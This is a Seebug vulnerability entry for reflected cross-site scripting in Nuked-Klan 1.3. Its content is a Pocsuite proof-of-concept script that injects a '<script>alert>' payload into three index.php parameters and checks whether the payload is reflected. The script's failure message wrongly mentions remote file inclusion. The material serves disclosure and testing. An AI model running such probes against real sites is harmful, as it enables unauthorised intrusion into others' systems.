Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities

2014-07-01T00:00:00
ID SSV:76085
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '76085'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = '2003-12-31'
    createDate = '2016-1-8'
    updateDate = '2016-1-8'
    references = ['http://www.sebug.net/vuldb/ssvid-76085']
    name = 'Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities'
    appPowerLink = 'http://sourceforge.net/projects/nukedklan/'
    appName = 'Nuked-Klan'
    appVersion = '1.3'
    vulType = 'Other'
    desc = '''
    Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities
    '''
    samples = ['']

    def _verify(self):
        pluginList = [   
						'index.php?file=Team&op=',
						'index.php?file=News&op=',
						'index.php?file=Liens&op='
                     ]
        result = {}
        for plugin in pluginList:
            vul_url = '%s%s%s' % (self.url , plugin , '<script>alert(/SeBUg/);</script>')
            response = req.get(vul_url, timeout=10).content
            if "<script>alert(/SeBUg/);</script>" in response:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                break
        return self.parse_res(result)

    def _attack(self):
        return self._verify()

    def parse_res(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Remote File Inclusion Failed')
        return output

register(TestPOC)